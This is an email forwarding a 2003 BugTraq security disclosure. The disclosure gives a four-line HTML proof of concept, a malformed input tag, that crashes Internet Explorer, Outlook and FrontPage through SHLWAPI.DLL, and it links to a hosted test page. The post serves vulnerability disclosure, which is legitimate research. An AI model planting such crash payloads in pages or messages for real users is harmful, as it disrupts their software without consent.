Take a look at this mail. You can find the example at:
  - http://esfahbod.info/proj/web/test/ie/crash.html

I tested the page with IE6 SP1 (latest Microsoft update), and it crashed too!

--------------------------------------------------------------------------
To: BugTraq
Subject: IE / Outlook / MS SHLWAPI Render - more trivial crash
Date: Apr 21 2003 10:07PM
Author: Ramon Pinuaga Cascales <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>

Hello:

Well, as it seems that it is the Microsoft Crash month, let's see another one:

---------------------------------
<html>
<form>
<input type crash>
</form>
</html>
---------------------------------

This will crash IE with the following error:

"Unhandled exception in iexplore.exe (SHLWAPI.DLL): 0xC0000005: Access Violation"

It's a null pointer overwrite, so it's not easily exploitable...

This HTML also crashes Outlook, Frontpage, and all the Microsoft programs that use the shlwapi.dll library to render web code.

Plain HTML is a dangerous language :)

--
Regards,
Ramon Pinuaga Cascales
mailto:[EMAIL PROTECTED]
Telematics Security Analyst
Tel: 620921960
--
--------------------------------------------------------------------------

--
Behnam Esfahbod ......[ http://esfahbod.info | behnam(a)esfahbod.info ]